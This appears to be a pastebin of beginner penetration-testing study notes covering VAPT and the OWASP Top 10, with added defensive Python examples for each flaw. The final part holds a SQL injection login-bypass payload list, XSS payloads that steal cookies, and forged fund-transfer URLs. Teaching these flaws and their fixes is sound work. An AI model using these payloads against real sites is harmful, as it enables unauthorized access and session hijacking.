· 6 years ago · Jan 02, 2020, 01:42 PM
VAPT
Vulnerability Assessment Penetration Testing
VAPT EXPERT = Vulnerability Assessment and Penetration Testing expert

So VULNERABILITY ASSESSMENT is a pre-hacking phase in which the intended person scans and tries to find out the security gaps or holes that make the device or software vulnerable.

Example
ip address -> 192.168.1.55
open ports (ports on which some application may be listening)
filtered ports (firewall protected)
os information - is it up to date?
services running on the ports


PENETRATION TESTING is a phase in which the intended person actually tests out the systems by simulating attacks on the systems.

Penetration testing is a method of evaluating the security of a computer system or network by simulating an attack like a malicious hacker. The process involves an active analysis of the system for any weaknesses, technical flaws or vulnerabilities. This analysis is carried out from the position of a potential attacker, and involves active exploitation of security vulnerabilities.

Example: using exploits for a known vulnerability

-> Windows 7 server

-> Using an exploit to exploit the server

At the end a proof of concept needs to be made and handed to the senior authority.

Example
Big banks or smart car manufacturers hire security professionals to hack into their systems ethically, and they pay large sums of money to them to do that. At the end of the VAPT a VAPT report needs to be handed to the bank's security team.


__________________________________________________



Owasp -> Open Web Application Security Project

Owasp top 10

1. Injection
2. Broken Authentication and Session Management
3. Cross Site Scripting (XSS)
4. Insecure Direct Object Reference
5. Security Misconfiguration
6. Sensitive Data Exposure
7. Missing Function Level Access Control
8. Cross Site Request Forgery
9. Using Known Vulnerable Components
10. Unvalidated Redirects and Forwards



1. Injection Vulnerabilities --> SQL, commands

An injection attack occurs only if hackers are able to send malicious, unintended data from an application to the interpreter, or say the backend of the website.

application -> untrusted data -> interpreter (backend)

Why this attack occurs ->>
This attack occurs because of improper validation -> for e.g. let's take the example of a sign-in or sign-up field on a web application. Now when a user is trying to sign in or sign up
it requires the user to enter id/password in a certain manner, like there should be no special characters involved etc. You will learn about that as regular expressions.

Similarly when a developer is setting up a webapp/application he/she needs to validate all the parameters, links and domains of the website so that commands or special characters are not interpreted by the backend.
__________________________________________________________________
2. Broken Authentication and Session Management

In broken authentication or session management, hackers make an attempt to steal accounts from other users. Attackers use leaks and flaws in the authentication or session management functions.

Why this attack occurs....

-> User credentials are not protected when stored using hashing or encryption
-> Credentials can be guessed or overwritten through weak management functions, e.g. the hacker is able to guess the session id, or change the password

-> Session ids are exposed in the url
-> Session ids don't time out
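Added example (this is not from the original notes): what fixing the points above looks like in code. Passwords are stored only as a salted PBKDF2 hash, session ids come from the OS random generator instead of a guessable counter, and a session that is idle longer than SESSION_LIFETIME_SECONDS is thrown away server-side. The function names, the 15 minute lifetime and the in-memory dicts are all assumptions made for the demo.

```python
import hashlib
import hmac
import os
import secrets
import time

# Added example, not part of the notes: hashed credential storage plus
# sessions that time out. Storage is an in-memory dict (hypothetical).

PBKDF2_ITERATIONS = 200_000
SESSION_LIFETIME_SECONDS = 15 * 60   # idle sessions die after 15 minutes (assumed value)

_users = {}      # username -> (salt, password_hash)
_sessions = {}   # session_id -> {"user": ..., "expires": ...}


def register(username, password):
    """Store only a salted PBKDF2 hash, never the plain password."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    _users[username] = (salt, digest)


def verify_password(username, password):
    """Recompute the hash for the supplied password and compare in constant time."""
    record = _users.get(username)
    if record is None:
        return False
    salt, stored = record
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return hmac.compare_digest(candidate, stored)


def login(username, password, now=None):
    """Return a fresh unguessable session id, or None when credentials are wrong."""
    if not verify_password(username, password):
        return None
    now = time.time() if now is None else now
    session_id = secrets.token_urlsafe(32)   # 256 random bits from the OS CSPRNG
    _sessions[session_id] = {"user": username, "expires": now + SESSION_LIFETIME_SECONDS}
    return session_id


def current_user(session_id, now=None):
    """Resolve a session id to a user, refusing unknown or timed-out ids."""
    now = time.time() if now is None else now
    session = _sessions.get(session_id)
    if session is None:
        return None
    if now >= session["expires"]:
        del _sessions[session_id]            # timed out: forget it on the server too
        return None
    session["expires"] = now + SESSION_LIFETIME_SECONDS   # sliding expiry on activity
    return session["user"]


if __name__ == "__main__":
    register("deepak", "correct horse battery staple")
    sid = login("deepak", "correct horse battery staple", now=1000.0)
    print(current_user(sid, now=1500.0))   # deepak
    print(current_user(sid, now=5000.0))   # None, the session timed out
```

The session id is sent to the browser in a cookie, never in the url, so it does not end up in browser history, proxy logs or the Referer header.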
______________________________________________________________________

3. Cross Site Scripting (XSS)

It is an attack in which hackers are able to execute JavaScript code on a website. It is of three types

-> Reflected XSS

-> Stored XSS

-> DOM XSS

This attack can be used by a hacker to execute JavaScript code in the victim's browser to hijack user sessions, deface the website, insert content, etc.

Why this attack occurs

-> Improper validation
-> Unsafe JavaScript APIs

Pentesting of a website can easily protect from XSS attacks, and XSS can also be found with simple code analysis.
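Added example (not from the original notes): a reflected "you searched for" page built the unsafe way and then with output encoding, run against the script payload that appears later in these notes. The second template shows the same fix inside an attribute value, where the attacker's trick is to close the quote first. Templates and function names are hypothetical.

```python
import html

# Added example, not part of the notes: reflected XSS, unsafe vs encoded output.

TEMPLATE = "<p>You searched for: {term}</p>"
ATTR_TEMPLATE = '<input name="q" value="{term}">'


def render_unsafe(term):
    """Reflects the query parameter verbatim, so a <script> in it is executed by the browser."""
    return TEMPLATE.format(term=term)


def render_safe(term):
    """Encodes &, <, > and quotes: the browser shows the text instead of running it."""
    return TEMPLATE.format(term=html.escape(term, quote=True))


def render_attr_safe(term):
    """Same idea inside an attribute value: quote=True turns " into &quot; so the
    payload cannot close the value="..." and start a new tag."""
    return ATTR_TEMPLATE.format(term=html.escape(term, quote=True))


def contains_live_tag(page):
    """Crude check used in the demo: is a raw <script tag still present in the output?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    payload = "<script>alert(document.cookie)</script>"
    print(render_unsafe(payload))        # script tag goes to the browser as-is
    print(render_safe(payload))          # &lt;script&gt;... shown as text
    print(render_attr_safe('"><script>alert(1)</script>'))
```

Encoding has to match the context the value lands in (HTML body, attribute, JavaScript string, URL); html.escape covers the first two, which is why the two templates above are shown separately.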
_______________________________________________________________________________

4. Insecure Direct Object Reference


It is a vulnerability in which an attacker who is authorised to his/her own dashboard is able to gain access to some other user's account by changing his/her own object reference assigned by the app.

study tonight

5. Security Misconfiguration

As the name is security misconfiguration, what it means is: imagine a webapp having admin accounts on it, or just having default accounts with default passwords but having certain privileges. Now if you run a website which has default accounts configured and your website is available in the public domain, then from an attacker's perspective he/she can actually go out and try the default credentials and would be able to log in to the website.

Why this attack occurs ->

-> Keeping default credentials
-> Using a component or plugin which may have some default credentials
e.g.
-> Directory listing is not disabled on your server.

Attacker discovers she can simply list directories to find any file. Attacker finds and downloads all your compiled Java classes, which she decompiles and reverse engineers to get all your custom code. She then finds a serious access control flaw in your application.
_______________________________________________________________________

6. Sensitive Data Exposure
Sensitive data exposure is a vulnerability that occurs when a hacker is able to gain access to sensitive data in motion or at rest, or even in the customer's/user's browser.


eg 1
An application encrypts credit card numbers in a database using automatic database encryption. However, this means it also decrypts this data automatically when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. The system should have encrypted the credit card numbers using a public key, and only allowed back-end applications to decrypt them with the private key.

eg 2
A site simply doesn't use SSL for all authenticated pages. Attacker simply monitors network traffic (like an open wireless network), and steals the user's session cookie. Attacker then replays this cookie and hijacks the user's session, accessing the user's private data.


_____________________________________________________________________________

7. Missing Function Level Access Control
-> It is an attack in which a hacker or an anonymous person is able to access an application interface that they would otherwise never have been able to access.

eg www.anywebsite.com/user

and the hacker is able to access www.anywebsite.com/admin
Now if a hacker/person is able to do that it is a flaw.
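Added example (not from the original notes) covering both item 4 and item 7: the object-level check that stops a user fetching another user's account by editing the id, and the function-level check that keeps /admin closed to a normal user even if they type the url directly. The account ids are the two numbers used elsewhere in these notes; the usernames, roles, routes and the Forbidden exception are constructed for the demo.

```python
# Added example, not part of the notes: authorization checks for IDOR (item 4)
# and missing function level access control (item 7). All data is constructed.

ACCOUNTS = {             # account_id -> owner username
    4673243243: "deepak",
    3762487216: "gagan",
}
ROLES = {"deepak": "user", "gagan": "user", "root": "admin"}

ADMIN_ONLY_PATHS = {"/admin", "/admin/users"}


class Forbidden(Exception):
    pass


def get_account(current_user, account_id):
    """IDOR fix: look the object up, then check that the caller actually owns it.
    Changing the id in the request no longer reaches someone else's record."""
    owner = ACCOUNTS.get(account_id)
    if owner is None or owner != current_user:
        # Same answer for 'not yours' and 'does not exist', so valid ids cannot be
        # told apart from invalid ones through differing error messages.
        raise Forbidden(f"{current_user} may not access account {account_id}")
    return {"id": account_id, "owner": owner}


def authorize_path(current_user, path):
    """Function-level fix: the role check runs on the server for every request,
    not only by hiding the /admin link from the /user page."""
    if path in ADMIN_ONLY_PATHS and ROLES.get(current_user) != "admin":
        raise Forbidden(f"{current_user} may not open {path}")
    return True


def can(fn, *args):
    """Helper for the demo: True if the check passes, False if it raises Forbidden."""
    try:
        fn(*args)
        return True
    except Forbidden:
        return False


if __name__ == "__main__":
    print(can(get_account, "deepak", 4673243243))   # True, own account
    print(can(get_account, "deepak", 3762487216))   # False, gagan's account
    print(can(authorize_path, "deepak", "/user"))   # True
    print(can(authorize_path, "deepak", "/admin"))  # False
    print(can(authorize_path, "root", "/admin"))    # True
```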
____________________________________________________________

8. Cross Site Request Forgery
In this attack the hacker creates a forged HTTP request and tricks the victim into submitting that request via images, tabs or XSS.



The application allows a user to submit a state-changing request that does not include anything secret.
For example:
http://anywebsite.com/app/transferFunds?amount=1500&destinationAccount=4673243243
This is all done by making the victim click on a link or on a certain appealing image.
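Added example (not from the original notes): the "something secret" the transferFunds request above is missing. The server derives a CSRF token from the session id, puts it in its own form, and refuses the state change when the token is absent or belongs to another session. A page on another origin can make the victim's browser send the cookie, but it cannot read or guess this token. SERVER_KEY, the session ids and the handler shape are assumptions for the demo; in a real app the transfer would also be a POST rather than a GET link.

```python
import hashlib
import hmac
import secrets

# Added example, not part of the notes: per-session CSRF token for the
# transferFunds request. Everything here is constructed for the demo.

SERVER_KEY = secrets.token_bytes(32)   # would live in server config, never in the page


def csrf_token(session_id):
    """Derive the token from the session id so a token from one session is useless in another."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def transfer_funds(session_id, params):
    """Handler for POST /app/transferFunds. Returns an (http status, message) pair."""
    supplied = params.get("csrf_token", "")
    expected = csrf_token(session_id)
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        # A forged request (an <img src=...> or an auto-submitted form on another
        # site) carries the victim's session cookie but cannot know this value.
        return 403, "missing or invalid CSRF token"
    amount = int(params["amount"])
    dest = params["destinationAccount"]
    return 200, f"transferred {amount} to {dest}"


if __name__ == "__main__":
    sid = "victim-session"
    # Forged request: the parameters from the url in the notes, but no token.
    print(transfer_funds(sid, {"amount": "1500", "destinationAccount": "4673243243"}))
    # Legitimate submission from the site's own form, which embeds the token.
    print(transfer_funds(sid, {"amount": "1500", "destinationAccount": "4673243243",
                               "csrf_token": csrf_token(sid)}))
```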
_______________________________________________________________



9. Using Components with Known Vulnerabilities
In this case the hacker tries to discover a weak component through scanning or manual analysis and then either finds an exploit if one is already available or writes an exploit.

eg
a website using a server which has an RCE exploit
or
a WordPress website which has a vulnerable component and has an exploit.
___________________________________________________________________________________

10. Unvalidated Redirects and Forwards
Attacker links to an unvalidated redirect and tricks the victim into clicking it; attacker targets unsafe forwards to bypass a security check.

eg http://anywebsite.com/redirect.jsp?url=evil.com

->-> url=evil.com <-<-
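Added example (not from the original notes): validating the url parameter of redirect.jsp before redirecting. Only a site-relative path, or an absolute url to an allow-listed host, is accepted; evil.com, the protocol-relative //evil.com, a javascript: url and a user@host trick all fall back to the home page. The host name, allow-list and function name are assumptions for the demo.

```python
from urllib.parse import urlparse

# Added example, not part of the notes: allow-list validation of a redirect target.

ALLOWED_HOSTS = {"anywebsite.com", "www.anywebsite.com"}   # constructed allow-list
DEFAULT_TARGET = "/"


def safe_redirect_target(url_param):
    """Return where redirect.jsp may send the browser for the given ?url= value."""
    if not url_param:
        return DEFAULT_TARGET
    # Case 1: a site-relative path such as /account?tab=1 stays on our site.
    # //evil.com and /\evil.com are rejected: browsers treat those as another host.
    if url_param.startswith("/") and not url_param.startswith(("//", "/\\")):
        return url_param
    # Case 2: an absolute url is allowed only over http(s) to a host we list.
    # .hostname drops user@ prefixes and ports, so https://anywebsite.com@evil.com/
    # is seen as evil.com and rejected.
    parsed = urlparse(url_param)
    if parsed.scheme in ("http", "https") and parsed.hostname in ALLOWED_HOSTS:
        return url_param
    # Anything else (bare evil.com, javascript:, data:, unknown hosts) -> home page.
    return DEFAULT_TARGET


if __name__ == "__main__":
    for value in ["evil.com", "//evil.com", "https://evil.com/login",
                  "https://anywebsite.com@evil.com/", "javascript:alert(1)",
                  "/account?tab=1", "https://www.anywebsite.com/account"]:
        print(f"{value!r:45} -> {safe_redirect_target(value)}")
```

The same check belongs on server-side forwards (the page parameter a servlet forwards to), since those bypass whatever access check sat in front of the original url.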

______________________________________________________________________________________
Introduction to DBMS
Database

A database is a collection of structured data sets which contains all the data (important credentials, logs, etc.).
Database Management System - this data needs to be managed and it is done with the help of a DBMS. A DBMS can also interact with the user and write user data to the database.

Databases can be of two types
SQL
NoSQL
There are certain tables and entries in a database

table name Member
_________________________________________________________
Name   | ID | NUMBER     | EMAIL              | ADDRESS     | Age |
_________________________________________________________
deepak | 10 | 9123456719 | deepak@yahoo.co.in | lokhandvala | 26  |
Gagan  | 4  | 9145619237 | gagan@gmail.com    | Delhi       | 20  |
_________________________________________________________


Structured queries would look like
for example
all the people who have age less than 30
so the query would look like

Select * from Member where age<30


h.w perform all queries
queries
= SELECT - extracts data from a database
= UPDATE - updates data in a database
= DELETE - deletes data from a database
= INSERT INTO - inserts new data into a database
= CREATE DATABASE - creates a new database
= ALTER DATABASE - modifies a database
= CREATE TABLE - creates a new table
= ALTER TABLE - modifies a table
= DROP TABLE - deletes a table
= SELECT * from trainees - Select everything from table name "trainees"
= WHERE - Showing the location of the data of the table, column etc.
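Added example (not from the original notes): running the queries in the list above against the Member table using Python's built-in sqlite3, which is an SQL database that needs no server. The two rows are the ones from the table; the column types, the extra JoinedOn column and the function names are assumptions. Every value is passed as a bound parameter (the ? placeholders), which is the habit that matters once the injection section comes up.

```python
import sqlite3

# Added example, not part of the notes: CREATE TABLE, INSERT INTO, SELECT ... WHERE,
# UPDATE, ALTER TABLE, DELETE and DROP TABLE on the Member table, in sqlite3.


def build_member_db():
    """CREATE TABLE + INSERT INTO: an in-memory database holding the two rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("""CREATE TABLE Member (
        Name TEXT, ID INTEGER PRIMARY KEY, NUMBER TEXT, EMAIL TEXT, ADDRESS TEXT, Age INTEGER)""")
    rows = [("deepak", 10, "9123456719", "deepak@yahoo.co.in", "lokhandvala", 26),
            ("Gagan", 4, "9145619237", "gagan@gmail.com", "Delhi", 20)]
    conn.executemany("INSERT INTO Member VALUES (?, ?, ?, ?, ?, ?)", rows)
    conn.commit()
    return conn


def younger_than(conn, age):
    """SELECT ... WHERE age<30 from the notes, with the age bound as a parameter."""
    cur = conn.execute("SELECT Name, Age FROM Member WHERE Age < ? ORDER BY ID", (age,))
    return cur.fetchall()


def update_address(conn, member_id, address):
    """UPDATE: returns how many rows changed."""
    cur = conn.execute("UPDATE Member SET ADDRESS = ? WHERE ID = ?", (address, member_id))
    return cur.rowcount


def add_column(conn):
    """ALTER TABLE: add a column, then return the table's column names."""
    conn.execute("ALTER TABLE Member ADD COLUMN JoinedOn TEXT")
    return [row[1] for row in conn.execute("PRAGMA table_info(Member)")]


def delete_member(conn, member_id):
    """DELETE: returns how many rows were removed."""
    cur = conn.execute("DELETE FROM Member WHERE ID = ?", (member_id,))
    return cur.rowcount


def drop_member_table(conn):
    """DROP TABLE: returns the remaining table names (empty once Member is gone)."""
    conn.execute("DROP TABLE Member")
    return [row[0] for row in conn.execute("SELECT name FROM sqlite_master WHERE type='table'")]


if __name__ == "__main__":
    db = build_member_db()
    print(younger_than(db, 30))          # [('Gagan', 20), ('deepak', 26)]
    print(update_address(db, 4, "Mumbai"))
    print(add_column(db))
    print(delete_member(db, 4))
    print(younger_than(db, 30))          # [('deepak', 26)]
    print(drop_member_table(db))         # []
```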

H.w Study MongoDB
SQL vs NoSQL

_________________________________
LVS Setup configuration Practical
_________________________________

______________________________________________
SQL Injection Authentication Bypass

What is happening at the time of authentication?
Let's imagine
there will be some query -> username=='Something' && password=='Something'

If we somehow make the query come out true and the DBMS gets confused, will it give us the login??

for eg username = 1' or '1' = '1
       password = 1' or '1' = '1

or what else can we try
 0' or '0' = '0
 2' or '2' = '2
 or
 0' or '3' = '3

So basically you just need to manage to make the query true, and if there is improper validation you can get access.
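Added example (not from the original notes) for this section and for item 1 of the top 10: the login query above built two ways in Python with sqlite3. build_query_unsafe pastes the form fields straight into the SQL text, which is the "improper validation" the notes talk about, so the input 1' or '1' = '1 turns the WHERE clause into something that is always true. login_safe sends the same SQL with the values bound as parameters, and the same input is just a username that does not exist. The users table, the demo account and the function names are constructed; the password is stored in plain text here only to keep the demo short.

```python
import sqlite3

# Added example, not part of the notes: the login query with fields concatenated
# in (the bug) beside the parameterized version (the fix). Demo data only.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('hello', 'hello1')")   # demo account
    return conn


def build_query_unsafe(username, password):
    """The query from the notes with the form fields pasted in: this is the defect.
    With both fields set to 1' or '1' = '1 the WHERE becomes
    username='1' or '1' = '1' AND password='1' or '1' = '1', which is always true."""
    return f"SELECT username FROM users WHERE username='{username}' AND password='{password}'"


def login_unsafe(conn, username, password):
    """Runs the concatenated query; returns the matched username or None."""
    row = conn.execute(build_query_unsafe(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same query, but the driver sends the values separately from the SQL text,
    so quotes and OR inside them are data, never part of the statement."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "1' or '1' = '1"
    print(build_query_unsafe(payload, payload))
    print(login_unsafe(db, payload, payload))   # hello  -> logged in without a password
    print(login_safe(db, payload, payload))     # None   -> no such user
    print(login_safe(db, "hello", "hello1"))    # hello  -> real credentials still work
```

Input validation (the regular expressions mentioned earlier) is a second layer; the parameterized query is the one that removes the bug, because it works even for fields that legitimately contain quotes.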



username = hello
password = hello1

login


1' or '1' = '1
1' or '1' = '1

... where username='1' or '1' = '1' & password ='1' or '1' = '1' ...


___________________________________________
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055


----------------
get method

post method


www.hisbank.com/transferfuntosunil's_account?amount=500000


website.com

username='something'
password='something'


login
username='something'
password='something'


1' or '1' = '1

... where username='1' or '1' = '1' and password='1' or '1' = '1' ...


<script>alert('hello Chai pilo Frands')</script>
"><script>alert('hello Chai pilo Frands')</script>
<ScRiPT>aler


https://bugcrowd.com/programs/session=1257

<script>alert(document.cookie)</script>


bankwebsite.com/transferfunds=10000toattackeraccount=3762487216


logic = admin' or '1' ='1

username='1' = '1' and password='1' = '1'


where username='12' or '3' ='3' and password='12' or '3' ='3'
 1 * 1


1' or '1' ='1

1' or '1=1'

1' = '1

admin' or 'admin' ='admin

12' or 'something'= 'something


<scRiPt>